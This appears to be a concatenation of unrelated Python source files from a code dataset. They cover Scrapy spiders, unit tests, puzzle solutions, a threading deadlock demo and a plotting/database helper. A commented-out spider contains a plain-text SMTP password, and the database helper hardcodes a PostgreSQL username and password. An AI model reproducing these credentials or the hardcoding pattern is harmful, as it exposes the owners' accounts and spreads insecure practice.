|
64fae91ef51cb384faf818ac502876f63733d358
|
[
"Apache-2.0"
] |
permissive
|
ckclark/Hackquest
|
1505f50fc2c735db059205d1c9bbba1832cc5059
|
65ed5fd32e79906c0e36175bbd280d976c6134bd
|
refs/heads/master
| 2021-01-16T19:32:29.434790 | 2015-09-29T13:39:04 | 2015-09-29T13:39:04 | 42,388,846 | 13 | 5 | null | null | null | null |
UTF-8
|
Python
| false | false | 460 |
py
|
lines = [x.strip() for x in open('64.txt').readlines()]
for shift in [16]: #range(len(lines[0])):
out_graph = []
for line in lines:
out_line = []
for i in range(len(line) - shift):
if line[i] == line[i + shift]:
out_line.append(' ')
else:
out_line.append('*')
out_line = ''.join(out_line)
out_graph.append(out_line)
print shift
print '\n'.join(out_graph)
|
[
"[email protected]"
] | |
5920ba78e09eb4f5be44b465dda4879c3b817140
|
1bfebc7e1c95cd3c25024b6b1adbf518e55513bf
|
/src/pykit/strutil/test/test_hex.py
|
111d8a160a9a91f0c53b0653ae2f85d8536d8489
|
[
"MIT"
] |
permissive
|
bsc-s2/ops
|
a9a217a47dad558285ca8064fa29fdff10ab4ad7
|
6fb8ad758b328a445005627ac1e5736f17088cee
|
refs/heads/master
| 2021-06-24T09:32:49.057026 | 2020-11-02T06:50:01 | 2020-11-02T06:50:01 | 123,527,739 | 8 | 0 |
MIT
| 2020-09-03T04:58:26 | 2018-03-02T03:54:20 |
Python
|
UTF-8
|
Python
| false | false | 5,256 |
py
|
#!/usr/bin/env python2
# coding: utf-8
import os
import unittest
from pykit import strutil
from pykit.strutil import Hex
from pykit import ututil
from pykit import utfjson
dd = ututil.dd
class TestHex(unittest.TestCase):
def test_init(self):
byte_length = 3
cases = (
(0, 0),
('000000', 0),
('\0\0\0', 0),
(256**2 + 2*256 + 3, 0x010203),
('010203', 0x010203),
('\1\2\3', 0x010203),
)
for inp, expected in cases:
dd(inp, expected)
c = Hex(inp, byte_length)
self.assertEqual(expected, c.int)
self.assertEqual('%06x' % expected, c)
def test_attr(self):
c = Hex('010203', 3)
self.assertEqual('010203', c.hex)
self.assertEqual('\1\2\3', c.bytes)
self.assertEqual(256**2 + 2*256 + 3, c.int)
self.assertIs('010203', c.hex)
self.assertIsNot('010203', c)
def test_init_invalid(self):
byte_length = 3
cases = (
(256**3-1, None),
(256**3, ValueError),
(-1, ValueError),
('\1\2', ValueError),
('\1\2\3\4', ValueError),
('0102', ValueError),
('01020', ValueError),
('0102030', ValueError),
('01020304', ValueError),
({}, TypeError),
)
for inp, err in cases:
dd(inp, err)
if err is None:
c = Hex(inp, byte_length)
else:
self.assertRaises(err, Hex, inp, byte_length)
def test_named_length(self):
val = 0x010203
cases = (
('crc32', '00010203'),
('Crc32', '00010203'),
('CRC32', '00010203'),
('md5', '00000000000000000000000000010203'),
('Md5', '00000000000000000000000000010203'),
('MD5', '00000000000000000000000000010203'),
('sha1', '0000000000000000000000000000000000010203'),
('Sha1', '0000000000000000000000000000000000010203'),
('SHA1', '0000000000000000000000000000000000010203'),
('sha256', '0000000000000000000000000000000000000000000000000000000000010203'),
('Sha256', '0000000000000000000000000000000000000000000000000000000000010203'),
('SHA256', '0000000000000000000000000000000000000000000000000000000000010203'),
)
for typ, expected in cases:
c = Hex(val, typ)
self.assertEqual(expected, c)
def test_checksum_shortcut(self):
val = 0x010203
self.assertEqual(Hex(val, 'crc32'), Hex.crc32(val))
self.assertEqual(Hex(val, 'md5'), Hex.md5(val))
self.assertEqual(Hex(val, 'sha1'), Hex.sha1(val))
self.assertEqual(Hex(val, 'sha256'), Hex.sha256(val))
def test_prefix(self):
pref = '1234'
cases = (
('crc32', '12340000'),
('md5', '12340000000000000000000000000000'),
('sha1', '1234000000000000000000000000000000000000'),
('sha256', '1234000000000000000000000000000000000000000000000000000000000000'),
)
for typ, expected in cases:
dd('typ:', typ)
c = Hex((pref, 0), typ)
self.assertEqual(expected, c)
self.assertEqual('12340101', Hex((pref, 1), 'crc32'))
def test_str_repr(self):
c = Hex.crc32(1)
self.assertEqual('00000001', str(c))
self.assertEqual("'00000001'", repr(c))
def test_json(self):
c = Hex.crc32(('0002', 0))
rst = utfjson.dump(c)
self.assertEqual('"00020000"', rst)
self.assertEqual(c, utfjson.load(rst))
def test_arithmetic(self):
c = Hex.crc32(5)
self.assertEqual(6, (c+1).int)
self.assertEqual(10, (c*2).int)
self.assertEqual(2, (c/2).int)
self.assertEqual(0, (c/6).int)
self.assertEqual(1, (c % 2).int)
self.assertEqual(25, (c**2).int)
self.assertEqual('00000006', (c+1))
self.assertEqual('0000000a', (c*2))
self.assertEqual('00000002', (c/2))
self.assertEqual('00000000', (c/6))
self.assertEqual('00000001', (c % 2))
self.assertEqual('00000019', (c**2))
self.assertEqual(6, (c + Hex.crc32(1)).int)
# overflow protection
self.assertEqual(0, (c-5).int)
self.assertEqual(0, (c-6).int)
d = Hex.crc32(('', 0xff))
self.assertEqual(d, d+1)
def test_arithmetic_error(self):
c = Hex.crc32(5)
cases = (
[],
(),
{},
'x',
u'我',
)
for inp in cases:
with self.assertRaises(TypeError):
c + inp
with self.assertRaises(TypeError):
c - inp
with self.assertRaises(TypeError):
c * inp
with self.assertRaises(TypeError):
c / inp
with self.assertRaises(TypeError):
c % inp
with self.assertRaises(TypeError):
c ** inp
|
[
"[email protected]"
] | |
50b28d0ed7daa7be97decf477b846c80cd2df47e
|
4f0385a90230c0fe808e8672bb5b8abcceb43783
|
/框架/crawler/scrapy/scrapy_demo/scrapy_demo/spiders/quotes.py
|
8c9928611b92d882b2c0eebf7d5163ee20e145da
|
[] |
no_license
|
lincappu/pycharmlearningproject
|
4084dab7adde01db9fa82a12769a67e8b26b3382
|
b501523e417b61373688ba12f11b384166baf489
|
refs/heads/master
| 2023-07-10T05:21:15.163393 | 2023-06-29T14:02:35 | 2023-06-29T14:02:35 | 113,925,289 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,268 |
py
|
# -*- coding: utf-8 -*-
import os
import sys
sys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))))
import scrapy
from scrapy_demo import items
from scrapy_demo import settings
import scrapy.settings
from scrapy.mail import MailSender
# This is the most basic spider form,
# class QuotesSpider(scrapy.Spider):
# name = "quotes"
# start_urls = [
# 'http://quotes.toscrape.com/page/1/',
# ]
#
# def parse(self, response):
# for quote in response.css('div.quote'):
# yield {
# 'text': quote.css('span.text::text').get(),
# 'author': quote.css('small.author::text').get(),
# 'tags': quote.css('div.tags a.tag::text').getall(),
# }
#
# next_page = response.css('li.next a::attr(href)').get()
# if next_page is not None:
#             next_page = response.urljoin(next_page)  # this urljoin uses the domain from start_urls
# yield scrapy.Request(next_page, callback=self.parse)
# The response.follow form; unlike Request, there is no need to call urljoin again -- the url comes back already joined
# class QuotesSpider(scrapy.Spider):
# name = 'quotes'
# start_urls = [
# 'http://quotes.toscrape.com/tag/humor/',
# ]
#
# def parse(self, response):
# for quote in response.css('div.quote'):
# yield {
# 'author': quote.xpath('span/small/text()').get(),
# 'text': quote.css('span.text::text').get(),
# }
#
# next_page = response.css('li.next a::attr("href")').get()
# if next_page is not None:
# yield response.follow(next_page, self.parse)
# The follow_all form, with another callback added.
# class AuthorSpider(scrapy.Spider):
# name = 'author'
#
# start_urls = ['http://quotes.toscrape.com/']
#
# def parse(self, response):
# author_page_links = response.css('.author + a')
# yield from response.follow_all(author_page_links, self.parse_author)
#
# pagination_links = response.css('li.next a')
# yield from response.follow_all(pagination_links, self.parse)
#
# def parse_author(self, response):
# def extract_with_css(query):
# return response.css(query).get(default='').strip()
#
# yield {
# 'name': extract_with_css('h3.author-title::text'),
# 'birthdate': extract_with_css('.author-born-date::text'),
# 'bio': extract_with_css('.author-description::text'),
# }
#
#
# Pass a parameter on the command line and override start_requests, so start_urls is not needed
# class QuotesSpider(scrapy.Spider):
# name = "quotes"
#
# def start_requests(self):
# url = 'http://quotes.toscrape.com/'
# tag = getattr(self, 'tag', None)
# if tag is not None:
# url = url + 'tag/' + tag
# yield scrapy.Request(url, self.parse)
#
# def parse(self, response):
# for quote in response.css('div.quote'):
# yield {
# 'text': quote.css('span.text::text').extract_first(),
# 'author': quote.css('small.author::text').extract_first(),
# }
#
# next_page = response.css('li.next a::attr(href)').extract_first()
# if next_page is not None:
# next_page = response.urljoin(next_page)
# yield scrapy.Request(next_page, self.parse)
# class DianyingSpider(scrapy.Spider):
# MAIL_HOST = 'smtp.exmail.qq.com'
# MAIL_PORT = 25
# MAIL_USER = "[email protected]"
# MAIL_PASS = "6bH9KPQoKD"
# MAIL_TLS = False
# MAIL_SSL = False
#
# name = "dianying"
# start_urls = [
# "https://www.dy2018.com/html/gndy/dyzz/"
#     ]
#     # default FEED exporter configuration options; the ItemExporter settings are not used here
# custom_settings = {
# 'FEED_URI': "file:///tmp/zzz.marshal",
# 'FEED_FORMAT': 'marshal',
# 'FEED_EXPORT_ENCODING':'utf8',
# 'FEED_EXPORT_FIELDS': ["url", "title"]
# }
#     # entry point
# def parse(self, response):
#         mailer = MailSender(
#             smtphost=settings.MAIL_HOST,
#             smtpuser=settings.MAIL_USER,
#             mailfrom=settings.MAIL_USER,
#             smtppass=settings.MAIL_PASS,
#             smtpport=settings.MAIL_PORT,
#             smtptls=settings.MAIL_TLS,
#             smtpssl=settings.MAIL_SSL,
#         )
#         mailer = MailSender.from_settings(self.settings)
#
# mailer.send(to=["[email protected]"], subject="北京新橙科技有限公司", body="Some body")
#
#     # iterate over every page of the "latest movies" listing
# for page in response.xpath("//select/option/@value").extract():
# url = "https://www.dy2018.com" + page
# self.logger.info('aaaaa %s' % url)
# yield scrapy.Request(url, callback=self.parsePage)
#
#     # process a single listing page
# def parsePage(self, response):
#         # collect the detail-page links of every movie on this page
# for link in response.xpath('//a[@class="ulink"]/@href').extract():
# url = "https://www.dy2018.com" + link
# self.logger.info('bbbbbb %s' % url)
# yield scrapy.Request(url, callback=self.parseChild)
#
#     # process a single movie detail page
# def parseChild(self, response):
#         # fetch the movie info and extract the data
# item = items.DianyingItem()
# item['url'] = response.url
# item['title'] = response.xpath('//div[@class="title_all"]/h1/text()').extract()
# item['magnet'] = response.xpath('//div[@id="Zoom"]//a[starts-with(@href, "magnet:")]/@href').extract()
# self.logger.info('ccccc %s' % item)
# yield item
# The ItemLoader form
# class DianyingSpider(scrapy.Spider):
# name = "dianying"
# start_urls = [
# "https://www.dy2018.com/html/gndy/dyzz/"
# ]
#
#     # entry point
# def parse(self, response):
#         # iterate over every page of the "latest movies" listing
# for page in response.xpath("//select/option/@value").extract():
# url = "https://www.dy2018.com" + page
# yield scrapy.Request(url, callback=self.parsePage)
#
#     # process a single listing page
# def parsePage(self, response):
#         # collect the detail-page links of every movie on this page
# for link in response.xpath('//a[@class="ulink"]/@href').extract():
# url = "https://www.dy2018.com" + link
# yield scrapy.Request(url, callback=self.parseChild)
#
#
# def parseChild(self, response):
# l = items.ArticleItemLoader(item=items.DianyingItem(), response=response)
# l.add_value('url', response.url)
# l.add_xpath('title', '//div[@class="title_all"]/h1/text()')
# l.add_xpath('magnet', '//div[@id="Zoom"]//img/@src')
# l.add_value('date', '20200611')
# l.add_value('name','fls')
# l.add_value('create_time','test')
# yield l.load_item()
#
# class DianyingSpider(scrapy.Spider):
#
# name = "dianying"
# start_urls = [
# "https://www.thepaper.cn/allGovUsers.jsp",
# ]
#
# def parse(self, response):
|
[
"[email protected]"
] | |
ec31acbdb0cf41622d1a325d3f894382ad8fd78f
|
d4fa331d7d8a00865f99ee2c05ec8efc0468fb63
|
/alg/remove_k_digits.py
|
f25427c08b7db78277402c25b6aa25fed1054238
|
[] |
no_license
|
nyannko/leetcode-python
|
5342620c789a02c7ae3478d7ecf149b640779932
|
f234bd7b62cb7bc2150faa764bf05a9095e19192
|
refs/heads/master
| 2021-08-11T04:11:00.715244 | 2019-02-05T15:26:43 | 2019-02-05T15:26:43 | 145,757,563 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 537 |
py
|
class Solution(object):
def removeKdigits(self, num, k):
"""
:type num: str
:type k: int
:rtype: str
"""
if len(num) <= k:
return '0'
stack = []
for i in num:
while stack and k > 0 and stack[-1] > i:
stack.pop()
k -= 1
stack.append(i)
# while k > 0:
# stack.pop()
# k -= 1
if k:
stack = stack[:-k]
return ''.join(stack).lstrip('0') or '0'
|
[
"[email protected]"
] | |
1f97596a4534396f4848c29caeee8100eb7f788e
|
de1abd0ebbb817aa5f23d369e7dda360fd6f1c32
|
/chapter3/scrapy/wikiSpider/wikiSpider/settings.py
|
9bf879252847b3f89efa7323e1c40f4f86ae3b30
|
[] |
no_license
|
CodedQuen/Web-Scraping-with-Python-
|
33aaa2e3733aa1f2b8c7a533d74f5d08ac868197
|
67f2d5f57726d5a943f5f044480e68c36076965b
|
refs/heads/master
| 2022-06-13T01:34:39.764531 | 2020-05-05T11:07:01 | 2020-05-05T11:07:01 | 261,435,932 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,258 |
py
|
# -*- coding: utf-8 -*-
# Scrapy settings for wikiSpider project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# http://doc.scrapy.org/en/latest/topics/settings.html
# http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
# http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'wikiSpider'
SPIDER_MODULES = ['wikiSpider.spiders']
NEWSPIDER_MODULE = 'wikiSpider.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'wikiSpider (+http://www.yourdomain.com)'
# Obey robots.txt rules
ROBOTSTXT_OBEY = True
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'wikiSpider.middlewares.WikispiderSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'wikiSpider.middlewares.MyCustomDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See http://scrapy.readthedocs.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html
#ITEM_PIPELINES = {
# 'wikiSpider.pipelines.WikispiderPipeline': 300,
#}
# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
|
[
"[email protected]"
] | |
ba1cba5c8a2a1b7898a46fb6a4abeebd84541336
|
51885da54b320351bfea42c7dd629f41985454cd
|
/abc075/c.py
|
18f98c98169acb0c09d089c7c2b89ef4b8bc0bd0
|
[] |
no_license
|
mskt4440/AtCoder
|
dd266247205faeda468f911bff279a792eef5113
|
f22702e3932e129a13f0683e91e5cc1a0a99c8d5
|
refs/heads/master
| 2021-12-15T10:21:31.036601 | 2021-12-14T08:19:11 | 2021-12-14T08:19:11 | 185,161,276 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,777 |
py
|
#
# abc075 c
#
import sys
from io import StringIO
import unittest
from collections import deque
class TestClass(unittest.TestCase):
def assertIO(self, input, output):
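        # Swap stdin/stdout for StringIO objects so that resolve() reads the
        # test input via input() and its printed output can be captured below.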
stdout, stdin = sys.stdout, sys.stdin
sys.stdout, sys.stdin = StringIO(), StringIO(input)
resolve()
sys.stdout.seek(0)
out = sys.stdout.read()[:-1]
sys.stdout, sys.stdin = stdout, stdin
self.assertEqual(out, output)
def test_入力例_1(self):
input = """7 7
1 3
2 7
3 4
4 5
4 6
5 6
6 7"""
output = """4"""
self.assertIO(input, output)
def test_入力例_2(self):
input = """3 3
1 2
1 3
2 3"""
output = """0"""
self.assertIO(input, output)
def test_入力例_3(self):
input = """6 5
1 2
2 3
3 4
4 5
5 6"""
output = """5"""
self.assertIO(input, output)
def resolve():
N, M = map(int, input().split())
AB = [list(map(int, input().split())) for _ in range(M)]
ans = 0
for i in range(M):
Target = AB[:]
Target.pop(i)
G = [[i+1, 0] for i in range(N)]
for ab in Target:
a, b = ab
G[a-1][1] += 1
G[b-1][1] += 1
G[a-1].append(b)
G[b-1].append(a)
F = [False] * N
Q = deque()
Q.append(1)
F[0] = True
while Q:
p = Q.pop()
if G[p-1][1] == 0:
continue
for np in G[p-1][2:]:
if F[np-1]:
continue
Q.append(np)
F[np-1] = True
for f in F:
if f == False:
ans += 1
break
print(ans)
if __name__ == "__main__":
# unittest.main()
resolve()
|
[
"[email protected]"
] | |
70e19baa27259958c38615665bee3f6c8ac77d48
|
b8cc6d34ad44bf5c28fcca9e0df01d9ebe0ee339
|
/入门学习/threading_dead_lock-eg.py
|
277a2b79b337003460067bedae3cb0eeca00cd29
|
[] |
no_license
|
python-yc/pycharm_script
|
ae0e72898ef44a9de47e7548170a030c0a752eb5
|
c8947849090c71e131df5dc32173ebe9754df951
|
refs/heads/master
| 2023-01-05T06:16:33.857668 | 2020-10-31T08:09:53 | 2020-10-31T08:09:53 | 296,778,670 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,591 |
py
|
"""
import threading
import time
lock_1 = threading.Lock()
lock_2 = threading.Lock()
def func_1():
    print("func_1 starting......")
    lock_1.acquire()
    print("func_1 acquired lock_1 ......")
    time.sleep(2)
    print("func_1 waiting for lock_2 .......")
    lock_2.acquire()
    print("func_1 acquired lock_2 ......")
    lock_2.release()
    print("func_1 released lock_2")
    lock_1.release()
    print("func_1 released lock_1")
    print("func_1 done......")
def func_2():
    time.sleep(3)
    print("func_2 starting......")
    lock_2.acquire()
    print("func_2 acquired lock_2 ......")
    # comment out the first sleep in this function and uncomment the one
    # below to reproduce the deadlock
    #time.sleep(3)
    print("func_2 waiting for lock_1 .......")
    lock_1.acquire()
    print("func_2 acquired lock_1 ......")
    lock_1.release()
    print("func_2 released lock_1")
    lock_2.release()
    print("func_2 released lock_2")
    print("func_2 done......")
if __name__ == '__main__':
    print("main program starting............")
    t1 = threading.Thread(target=func_1,args=())
    t2 = threading.Thread(target=func_2,args=())
    t1.start()
    t2.start()
    t1.join()
    t2.join()
    print("main program finished..........")
"""
import threading
import time
lock_1 = threading.Lock()
lock_2 = threading.Lock()
def func_1():
    print("func_1 starting......")
    # give the acquire a time limit and give up once it expires
    lock_1.acquire(timeout=4)
    print("func_1 acquired lock_1 ......")
    time.sleep(2)
    print("func_1 waiting for lock_2 .......")
    rst = lock_2.acquire(timeout=2)
    if rst:
        print("func_1 obtained lock_2")
        lock_2.release()
        print("func_1 released lock_2")
    else:
        print("func_1 never managed to acquire lock_2....")
    lock_1.release()
    print("func_1 released lock_1")
    print("func_1 done......")
def func_2():
    print("func_2 starting......")
    lock_2.acquire()
    print("func_2 acquired lock_2 ......")
    time.sleep(3)
    print("func_2 waiting for lock_1 .......")
    lock_1.acquire()
    print("func_2 acquired lock_1 ......")
    lock_1.release()
    print("func_2 released lock_1")
    lock_2.release()
    print("func_2 released lock_2")
    print("func_2 done......")
if __name__ == '__main__':
    print("main program starting............")
    t1 = threading.Thread(target=func_1,args=())
    t2 = threading.Thread(target=func_2,args=())
    t1.start()
    t2.start()
    t1.join()
    t2.join()
    print("main program finished..........")
|
[
"15655982512.com"
] |
15655982512.com
|
90d662d9b82ee1a8490bdc09aa96fc25d2c0ce6e
|
832852c679816673f708860929a36a20ca8d3e32
|
/Configurations/HighMass/Full2017/configuration_mm.py
|
1ee0bb7d5dbf9cfab8779a7973ed2065f8bd52d3
|
[] |
no_license
|
UniMiBAnalyses/PlotsConfigurations
|
c4ec7376e2757b838930dfb2615e1dc99a64e542
|
578fe518cfc608169d3418bcb63a8342d3a24390
|
refs/heads/master
| 2023-08-31T17:57:45.396325 | 2022-09-01T10:13:14 | 2022-09-01T10:13:14 | 172,092,793 | 0 | 13 | null | 2023-04-27T10:26:52 | 2019-02-22T15:52:44 |
Python
|
UTF-8
|
Python
| false | false | 905 |
py
|
# example of configuration file
treeName= 'Events'
tag = 'Full2017_mm'
# used by mkShape to define output directory for root files
outputDir = 'rootFile_'+tag
# file with TTree aliases
aliasesFile = 'aliases.py'
# file with list of variables
variablesFile = 'variables.py'
# file with list of cuts
cutsFile = 'cuts_ee_mm.py'
# file with list of samples
samplesFile = 'samples.py'
# file with list of samples
plotFile = 'plot.py'
# luminosity to normalize to (in 1/fb)
lumi = 41.5
# used by mkPlot to define output directory for plots
# different from "outputDir" to do things more tidy
outputDirPlots = 'plot_'+tag
# used by mkDatacards to define output directory for datacards
outputDirDatacard = 'datacards'
# structure file for datacard
#structureFile = 'structure.py' # Is this even needed still?
# nuisances file for mkDatacards and for mkShape
nuisancesFile = 'nuisances.py'
|
[
"[email protected]"
] | |
e1c8772a70ff0b7a5ead0b6c73d8adda9807dd1a
|
28c598bf75f3ab287697c7f0ff1fb13bebb7cf75
|
/testgame.mmo/genesis/spawn/spawnmain.py
|
d1a6e96ee033931ad1e1cf4df3507ff6d4965fc9
|
[] |
no_license
|
keaysma/solinia_depreciated
|
4cb8811df4427261960af375cf749903d0ca6bd1
|
4c265449a5e9ca91f7acf7ac05cd9ff2949214ac
|
refs/heads/master
| 2020-03-25T13:08:33.913231 | 2014-09-12T08:23:26 | 2014-09-12T08:23:26 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 338 |
py
|
import races
import animal
import npc
"""
#Critter Pack
#http://www.mmoworkshop.com/trac/mom/wiki/Store
"""
#import critters
"""
#Monster Pack Examples
#http://www.mmoworkshop.com/trac/mom/wiki/Store
"""
#import monsters
"""
Mythical Creature Pack Examples
http://www.mmoworkshop.com/trac/mom/wiki/Store
"""
#import mythical
|
[
"[email protected]"
] | |
0ce5054c29d7414e6c56e074af1b1ef1b32afe58
|
f95e73867e4383784d6fdd6a1c9fe06cffbfd019
|
/CheckIO/HOME/pawn_brotherhood.py
|
4b0929a05d3c3562eadcb0a6374c8a5fdf00444c
|
[] |
no_license
|
linxiaohui/CodeLibrary
|
da03a9ed631d1d44b098ae393b4bd9e378ab38d3
|
96a5d22a8c442c4aec8a064ce383aba8a7559b2c
|
refs/heads/master
| 2021-01-18T03:42:39.536939 | 2018-12-11T06:47:15 | 2018-12-11T06:47:15 | 85,795,767 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 554 |
py
|
#!/usr/bin/env python
# *-* coding:UTF-8 *-*
def safe_pawns(pawns):
cnt=0
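    # A pawn is protected when a friendly pawn stands one column to its left
    # or right on the row below (pawns defend diagonally forward).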
for l in pawns:
col,row=l.lower()
if int(row)==1:
continue
        if (col >= 'b' and chr(ord(col)-1)+str(int(row)-1) in pawns) or (col <= 'g' and chr(ord(col)+1)+str(int(row)-1) in pawns):
cnt+=1
return cnt
if __name__ == '__main__':
#These "asserts" using only for self-checking and not necessary for auto-testing
assert safe_pawns({"b4", "d4", "f4", "c3", "e3", "g5", "d2"}) == 6
assert safe_pawns({"b4", "c4", "d4", "e4", "f4", "g4", "e5"}) == 1
|
[
"[email protected]"
] | |
6fef01c2498c9a9b7a52d8a294080b7fe61d6627
|
487ce91881032c1de16e35ed8bc187d6034205f7
|
/codes/CodeJamCrawler/CJ/16_2_1_Dom_ju.py
|
c726b4de6450f76ad915989d09c20461a1c9a8cd
|
[] |
no_license
|
DaHuO/Supergraph
|
9cd26d8c5a081803015d93cf5f2674009e92ef7e
|
c88059dc66297af577ad2b8afa4e0ac0ad622915
|
refs/heads/master
| 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 |
Python
|
UTF-8
|
Python
| false | false | 538 |
py
|
DOWNLOAD_DIR = "/Users/Dom/Downloads/"
def jopen( filename ):
return open( DOWNLOAD_DIR+filename+".in", "r")
def jout( filename, results, linebreaks=False ):
f = open(DOWNLOAD_DIR+filename+".out","w")
for n in range(len(results)):
f.write( "Case #" + str(n+1) + ": " )
        # test results[n] (the case's value), not the loop index n
        if isinstance(results[n], list):
            if linebreaks:
                f.write( "\n" )
            f.write( " ".join(str(x) for x in results[n]) + "\n" )
else:
if linebreaks:
f.write( "\n" )
f.write( str(results[n]) + "\n" )
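# Hedged usage sketch: `results` holds one answer per test case, e.g.
#   jout("A-small", [3, 7, 10])   # "A-small" is an illustrative file name
# writes "Case #1: 3" (and so on) to DOWNLOAD_DIR/A-small.out.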
|
[
"[[email protected]]"
] | |
1e4f57cb7ae54552f4520fc68b828043c2167752
|
e41c10e0b17265509fd460f860306784522eedc3
|
/basic_config.py
|
8e0791dbf7f899d792c04ef3414e39b0ef1d7b41
|
[
"CC0-1.0"
] |
permissive
|
hyyc116/research_paradigm_changing
|
c77ecf2533a6b2e2cd3f74fc3d3073454bffc55c
|
eac69c45a7a17eb70ace185fa22831ac785e504e
|
refs/heads/master
| 2020-11-24T05:48:07.973347 | 2019-12-18T12:17:02 | 2019-12-18T12:17:02 | 227,992,284 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,102 |
py
|
#coding:utf-8
import os
import sys
import json
from collections import defaultdict
from collections import Counter
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from scipy.optimize import curve_fit
from sklearn.metrics import r2_score
import math
import numpy as np
import random
import logging
import networkx as nx
from itertools import combinations
import pylab
import itertools
from mpl_toolkits.mplot3d import Axes3D
from scipy.interpolate import spline
from multiprocessing.dummy import Pool as ThreadPool
from networkx.algorithms import isomorphism
from matplotlib import cm as CM
from collections import Counter
from scipy.signal import wiener
import matplotlib as mpl
from matplotlib.patches import Circle
from matplotlib.patheffects import withStroke
import matplotlib.colors as colors
from matplotlib.colors import LogNorm
from matplotlib.colors import LinearSegmentedColormap
from networkx.algorithms.core import core_number
from networkx.algorithms.core import k_core
import psycopg2
from cycler import cycler
import six
# from gini import gini
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s',level=logging.INFO)
mpl.rcParams['agg.path.chunksize'] = 10000
color_sequence = ['#1f77b4', '#aec7e8', '#ff7f0e', '#ffbb78', '#2ca02c',
'#98df8a', '#d62728', '#ff9896', '#9467bd', '#c5b0d5',
'#8c564b', '#c49c94', '#e377c2', '#f7b6d2', '#7f7f7f',
'#c7c7c7', '#bcbd22', '#dbdb8d', '#17becf', '#9edae5']
mpl.rcParams['axes.prop_cycle'] = cycler('color', color_sequence)
# color = plt.cm.viridis(np.linspace(0.01,0.99,6)) # This returns RGBA; convert:
# hexcolor = map(lambda rgb:'#%02x%02x%02x' % (rgb[0]*255,rgb[1]*255,rgb[2]*255),
# tuple(color[:,0:-1]))
# mpl.rcParams['axes.prop_cycle'] = cycler('color', hexcolor)
params = {'legend.fontsize': 8,
'axes.labelsize': 8,
'axes.titlesize':10,
'xtick.labelsize':8,
'ytick.labelsize':8}
pylab.rcParams.update(params)
# from paths import *
def circle(ax,x,y,radius=0.15):
circle = Circle((x, y), radius, clip_on=False, zorder=10, linewidth=1,
edgecolor='black', facecolor=(0, 0, 0, .0125),
path_effects=[withStroke(linewidth=5, foreground='w')])
ax.add_artist(circle)
def autolabel(rects,ax,total_count=None,step=1,):
"""
Attach a text label above each bar displaying its height
"""
for index in np.arange(len(rects),step=step):
rect = rects[index]
height = rect.get_height()
# print height
if not total_count is None:
ax.text(rect.get_x() + rect.get_width()/2., 1.005*height,
'{:}\n({:.6f})'.format(int(height),height/float(total_count)),
ha='center', va='bottom')
else:
ax.text(rect.get_x() + rect.get_width()/2., 1.005*height,
'{:}'.format(int(height)),
ha='center', va='bottom')
class dbop:
def __init__(self,insert_index=0):
self._insert_index=insert_index
self._insert_values=[]
logging.debug("connect database with normal cursor.")
self._db = psycopg2.connect(database='core_data',user="buyi",password = "ruth_hardtop_isthmus_bubbly")
self._cursor = self._db.cursor()
def query_database(self,sql):
self._cursor.close()
self._cursor = self._db.cursor()
self._cursor.execute(sql)
logging.debug("query database with sql {:}".format(sql))
return self._cursor
def insert_database(self,sql,values):
self._cursor.close()
self._cursor = self._db.cursor()
self._cursor.executemany(sql,values)
logging.debug("insert data to database with sql {:}".format(sql))
self._db.commit()
